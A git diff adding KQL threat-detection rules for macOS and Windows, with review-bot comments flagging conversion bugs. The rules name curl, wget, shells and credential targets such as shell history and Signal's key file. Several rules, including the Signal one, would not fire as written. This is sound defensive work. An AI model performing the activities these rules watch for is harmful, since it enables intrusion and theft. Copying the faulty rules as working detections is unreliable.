+| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" 
or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql
new file mode 100644
index 00000000..f247de83
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql
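Review bot: The Microsoft AutoUpdate exclusion in the `not(...)` filter of the `where` clause is dead: `ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*"` is a case-insensitive equality test in KQL, and the `*` characters are literal, so no real command line can equal that string and the msupdate false positive the Sigma rule meant to suppress is never filtered. The glob should become a regex such as `ProcessCommandLine matches regex @"(?i)/Library/Application Support/Microsoft/MAU.*/Microsoft AutoUpdate\.app/Contents/MacOS/msupdate"`; this looks like a general wildcard-to-KQL conversion gap rather than a one-off, so other generated rules with `=~ "*...*"` probably need the same check. The trailing `not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))` can be written as `isnotempty(ProcessCommandLine)`. The `where` expression begins on the previous source line.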
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution via macOS Script Editor
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects when the macOS Script Editor utility spawns an unusual child process.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql
new file mode 100644
index 00000000..a9250bc4
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious History File Operations
+// Author: Mikhail Larin, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects commandline operations on shell history files
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.003
+// False Positives:
+// - Legitimate administrative activity
+// - Legitimate software, cleaning hist file
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql
new file mode 100644
index 00000000..926df4fa
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Installer Package Child Process
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: medium
+// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control
+// False Positives:
+// - Legitimate software uses the scripts (preinstall, postinstall)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql
new file mode 100644
index 00000000..906b300c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious MacOS Firmware Activity
+// Author: Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
+// MITRE Tactic: Impact
+// Tags: attack.impact
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql
new file mode 100644
index 00000000..a29c8335
--- /dev/null
+++ b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Microsoft Office Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql
new file mode 100644
index 00000000..04e5e080
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Using Ioreg
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "ioreg" which will show I/O Kit registry information.
+// This process is used for system information discovery.
+// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql
new file mode 100644
index 00000000..5f7cee88
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery Using sw_vers
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "sw_vers" for system information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql
new file mode 100644
index 00000000..b8bc28ec
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql
@@ -0,0 +1,13 @@
+// Title: System Information Discovery Using System_Profiler
+// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
+// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql
new file mode 100644
index 00000000..7419fa36
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql
@@ -0,0 +1,13 @@
+// Title: System Information Discovery Via Sysctl - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
+// This process is primarily used to detect and avoid virtualization and analysis environments.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql
new file mode 100644
index 00000000..5166b100
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql
@@ -0,0 +1,10 @@
+// Title: System Integrity Protection (SIP) Disabled
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql
new file mode 100644
index 00000000..06cdc475
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: System Integrity Protection (SIP) Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: low
+// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql
new file mode 100644
index 00000000..d47ce49d
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_network_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql
new file mode 100644
index 00000000..85bcf7b1
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd"))
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql
new file mode 100644
index 00000000..039fdd94
--- /dev/null
+++ b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql
@@ -0,0 +1,12 @@
+// Title: System Shutdown/Reboot - MacOs
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
new file mode 100644
index 00000000..a309ed3b
--- /dev/null
+++ b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
@@ -0,0 +1,13 @@
+// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
+// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql
new file mode 100644
index 00000000..3e5197f8
--- /dev/null
+++ b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql
@@ -0,0 +1,13 @@
+// Title: Time Machine Backup Disabled Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
+// An attacker can use this to prevent backups from occurring.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql
new file mode 100644
index 00000000..ddb60274
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via Dscl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "dscl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql
new file mode 100644
index 00000000..1017b5ae
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via DseditGroup
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql
new file mode 100644
index 00000000..3de1e977
--- /dev/null
+++ b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Admin Group Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-03-19
+// Level: medium
+// Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql
new file mode 100644
index 00000000..e1e7be01
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Outgoing Logon with New Credentials
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: low
+// Description: Detects logon events that specify new credentials
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550
+// False Positives:
+// - Legitimate remote administration activity
+
+DeviceLogonEvents
+| where LogonType == 9
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql
new file mode 100644
index 00000000..e2c25695
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql
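Review bot: `| where LogonType == 9` in outgoing_logon_with_new_credentials.kql carries the numeric Windows Security-event logon type over unchanged, but `LogonType` in the Defender `DeviceLogonEvents` table is a string category (values such as "Interactive", "Network", "RemoteInteractive"), so comparing it to the integer 9 will either fail to compile or never match, and the rule is silently dead. The converter needs a Security-event-to-MDE mapping for this field rather than a literal copy; the replacement literal is the string that MDE uses for a run-as-with-new-credentials logon and should be confirmed against the current table schema before the rule is merged. A comment in the generated file such as `// NOTE: Sigma source filters Security EventID 4624 LogonType 9; MDE exposes LogonType as a named string, not a number` would stop future regenerations from reintroducing the mismatch.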
@@ -0,0 +1,13 @@
+// Title: Successful Account Login Via WMI
+// Author: Thomas Patzke
+// Date: 2019-12-04
+// Level: low
+// Description: Detects successful logon attempts performed with WMI
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - Monitoring tools
+// - Legitimate system administration
+
+DeviceLogonEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql
new file mode 100644
index 00000000..ebd0a0c3
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql
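Review bot: The title and description promise successful logons, but the where clause filters only on the initiating process, so LogonFailed rows in DeviceLogonEvents match just as well and the rule will be noisier than its "low" level suggests. Add the outcome to the predicate: `| where ActionType == "LogonSuccess" and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"`.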
@@ -0,0 +1,11 @@
+// Title: Azure AD Health Monitoring Agent Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql
new file mode 100644
index 00000000..14234cf9
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql
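Review bot: `RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent"` carries the kernel object-manager form of the path from the Security 4663 ObjectName field, but DeviceRegistryEvents reports RegistryKey as `HKEY_LOCAL_MACHINE\SOFTWARE\...`, so this exact match never fires; the ADHealthAgent hunk that follows has the same path form. The deeper issue is that these source rules detect handle requests and reads against a SACL-audited key, whereas DeviceRegistryEvents only records modification ActionTypes (key/value created, set, deleted, renamed), so this hunk, the Azure AD Health Service Agents hunk, the SAM Registry Hive Handle Request hunk and the SysKey Registry Keys Access hunk cannot reproduce their source semantics on this table and are better emitted as unsupported than as silent rules. If the rule is kept as change detection, write the key in the table's form, `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent"`, and state in the header that it now sees modifications only, not reads.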
@@ -0,0 +1,13 @@
+// Title: Azure AD Health Service Agents Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
+// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
+// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
+// Make sure you set the SACL to propagate to its sub-keys.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql
new file mode 100644
index 00000000..622f8b7a
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql
@@ -0,0 +1,15 @@
+// Title: File Access Of Signal Desktop Sensitive Data
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-10-19
+// Level: medium
+// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
+// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
+// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
+// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely, but possible from AV or backup software accessing the files.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql
new file mode 100644
index 00000000..1083ee9d
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql
